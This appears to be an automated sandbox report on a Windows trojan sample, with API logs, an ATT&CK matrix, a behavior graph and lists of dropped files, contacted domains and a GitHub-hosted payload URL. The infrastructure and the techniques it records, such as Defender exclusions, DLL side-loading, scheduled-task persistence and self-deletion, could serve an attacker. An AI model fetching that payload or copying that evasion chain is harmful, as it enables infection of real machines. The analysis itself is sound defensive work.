Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\58VSNPxrI4.exeCode function: 0_2_00007FF783AC6F94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF783AC6F94
Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF6EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,32_2_00007FFBBAF6EFC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA1EA6 bind,WSAGetLastError,32_2_00007FFBBAFA1EA6
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,32_2_00007FFBBAF9B3F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF57410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,32_2_00007FFBBAF57410
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA2130 bind,WSAGetLastError,32_2_00007FFBBAFA2130

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping11
System Time Discovery		1
Exploitation of Remote Services		12
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts1
Native API		1
Valid Accounts		1
Valid Accounts		1
Deobfuscate/Decode Files or Information		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		111
Windows Service		1
Access Token Manipulation		2
Obfuscated Files or Information		Security Account Manager22
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Command and Scripting Interpreter		1
Scheduled Task/Job		111
Windows Service		1
DLL Side-Loading		NTDS221
Security Software Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
Scheduled Task/Job		Network Logon Script11
Process Injection		11
File Deletion		LSA Secrets1
Process Discovery		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable Media1
Service Execution		RC Scripts1
Scheduled Task/Job		12
Masquerading		Cached Domain Credentials121
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Valid Accounts		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc Filesystem1
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
Virtualization/Sandbox Evasion		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578892 Sample: 58VSNPxrI4.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 117 unvmainx.com 2->117 119 unvdwl.com 2->119 121 5 other IPs or domains 2->121 123 Multi AV Scanner detection for dropped file 2->123 125 Multi AV Scanner detection for submitted file 2->125 127 Sigma detected: TrustedPath UAC Bypass Pattern 2->127 129 9 other signatures 2->129 13 58VSNPxrI4.exe 2 2->13         started        17 svchost.exe 1 2->17         started        20 console_zero.exe 2->20         started        signatures3 process4 dnsIp5 105 C:\Windows \System32\printui.dll, PE32+ 13->105 dropped 107 C:\Windows \System32\printui.exe, PE32+ 13->107 dropped 151 Self deletion via cmd or bat file 13->151 153 Adds a directory exclusion to Windows Defender 13->153 22 cmd.exe 1 13->22         started        25 cmd.exe 1 13->25         started        27 cmd.exe 1 13->27         started        39 2 other processes 13->39 111 github.com 20.233.83.145, 443, 49785, 49804 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->111 113 unvmainx.com 194.26.192.189, 49708, 5432 HEANETIE Netherlands 17->113 115 5 other IPs or domains 17->115 109 C:\Windows\System32\winsvcf\x549596.dat, PE32+ 17->109 dropped 155 Benign windows process drops PE files 17->155 157 Found API chain indicative of debugger detection 17->157 29 cmd.exe 1 17->29         started        31 cmd.exe 17->31         started        33 cmd.exe 17->33         started        35 cmd.exe 17->35         started        37 cmd.exe 20->37         started        file6 signatures7 process8 signatures9 131 Drops executables to the windows directory (C:\Windows) and starts them 22->131 41 2 other processes 22->41 133 Uses schtasks.exe or at.exe to add and modify task schedules 25->133 135 Adds a directory exclusion to Windows Defender 25->135 45 2 other processes 25->45 47 2 other processes 27->47 49 2 other processes 29->49 51 2 other processes 31->51 53 2 other processes 33->53 55 2 other processes 35->55 57 2 other processes 37->57 59 3 other processes 39->59 process10 file11 97 C:\Windows\System32\zlib1.dll, PE32+ 41->97 dropped 99 C:\Windows\System32\x939048.dat, PE32+ 41->99 dropped 101 C:\Windows\System32\ucrtbased.dll, PE32+ 41->101 dropped 103 9 other files (7 malicious) 41->103 dropped 61 cmd.exe 1 41->61         started        64 cmd.exe 1 41->64         started        66 cmd.exe 1 41->66         started        68 2 other processes 41->68 143 Loading BitLocker PowerShell Module 55->143 145 Adds a directory exclusion to Windows Defender 59->145 signatures12 process13 signatures14 147 Drops executables to the windows directory (C:\Windows) and starts them 61->147 70 console_zero.exe 61->70         started        73 conhost.exe 61->73         started        149 Adds a directory exclusion to Windows Defender 64->149 75 powershell.exe 22 64->75         started        77 conhost.exe 64->77         started        79 reg.exe 1 1 66->79         started        81 conhost.exe 66->81         started        83 sc.exe 1 66->83         started        85 sc.exe 1 66->85         started        87 4 other processes 68->87 process15 signatures16 137 Multi AV Scanner detection for dropped file 70->137 89 cmd.exe 70->89         started        139 Loading BitLocker PowerShell Module 75->139 141 Creates a Windows Service pointing to an executable in C:\Windows 79->141 process17 process18 91 schtasks.exe 89->91         started        93 conhost.exe 89->93         started        process19 95 conhost.exe 91->95         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
58VSNPxrI4.exe46%VirustotalBrowse
58VSNPxrI4.exe39%ReversingLabsWin64.Trojan.Generic
58VSNPxrI4.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\System32\x939048.dat100%Joe Sandbox ML
C:\Windows \System32\printui.dll32%ReversingLabsWin64.Trojan.Lazy
C:\Windows \System32\printui.exe0%ReversingLabs
C:\Windows\System32\console_zero.exe42%ReversingLabsWin64.Trojan.Lazy
C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
C:\Windows\System32\libcurl.dll0%ReversingLabs
C:\Windows\System32\libiconv-2.dll0%ReversingLabs
C:\Windows\System32\libintl-9.dll0%ReversingLabs
C:\Windows\System32\libpq.dll0%ReversingLabs
C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
C:\Windows\System32\ucrtbased.dll0%ReversingLabs
C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
C:\Windows\System32\x939048.dat34%ReversingLabsWin64.Trojan.Midie
C:\Windows\System32\zlib1.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
unvdwl.com
45.94.31.128
truefalse
    		unknown
    ipinfo.io
    		34.117.59.81
    		truefalse
      		high
      github.com
      		20.233.83.145
      		truefalse
        		high
        raw.githubusercontent.com
        		185.199.108.133
        		truefalse
          		high
          unvmainx.com
          		194.26.192.189
          		truefalse
            		unknown
            dns.google
            		8.8.4.4
            		truefalse
              		high
              rootunvdwl.com
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.datfalse
                  		high
                  https://github.com/runvd01/dwl/raw/refs/heads/main/un1/uusb.datfalse
                    		high
                    https://dns.google/resolve?name=rootunvdwl.comfalse
                      		high
                      https://dns.google/resolve?name=unvdwl.comfalse
                        		high
                        https://ipinfo.io/jsonfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ipinfo.io/missingauthsvchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://curl.se/docs/http-cookies.html58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmpfalse
                              		high
                              https://dns.google/resolve?name=58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808210205.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 00000020.00000000.1749217813.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000002.1826480187.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000000.1764823946.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmpfalse
                                		high
                                https://www.gnu.org/licenses/58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845803486.00000000660F4000.00000008.00000001.01000000.0000000F.sdmpfalse
                                  		high
